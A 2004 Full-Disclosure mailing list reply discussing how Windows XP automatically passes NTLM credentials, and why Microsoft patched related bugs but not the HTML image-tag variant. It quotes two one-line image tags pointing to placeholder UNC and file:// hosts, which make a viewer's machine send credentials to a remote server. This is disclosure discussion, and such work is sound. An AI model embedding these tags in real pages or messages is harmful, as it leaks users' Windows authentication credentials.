Full Disclosure mailing list archives
Re: Automatically passing NTLM authentication credentials on Windows XP
From: "Hidenobu Seki" <urity_friday () hotmail com>
Date: Wed, 29 Sep 2004 10:43:15 +0900
From: 3APA3A <3APA3A () SECURITY NNOV RU> This problem is known since at least 1997 and still can be exploited with <IMG SRC="\\w.x.y.z\fakeshare\fakefile"> without any MS Word document.
It is not true. They are different problems that happen the same phenomenon.Mr. Cesar Cerrudo taught me that <img src=file://\\www.xxx.yyy\test> still works.
Tell me why Microsoft issued patches for MS00-067(KB272743) and MS01-001(KB282132) but not for "img src". > 3APA3A or all
Kind regards, Urity _________________________________________________________________STOP MORE SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Automatically passing NTLM authentication credentials on Windows XP Hidenobu Seki (Sep 27)
- Re: Automatically passing NTLM authentication credentials on Windows XP 3APA3A (Sep 28)
- Re: Automatically passing NTLM authentication credentials on Windows XP Barrie Dempster (Sep 28)
- <Possible follow-ups>
- Re: Automatically passing NTLM authentication credentials on Windows XP Hidenobu Seki (Sep 28)
- Re[2]: Automatically passing NTLM authentication credentials on Windows XP Hidenobu Seki (Sep 29)
- Re: Automatically passing NTLM authentication credentials on Windows XP 3APA3A (Sep 28)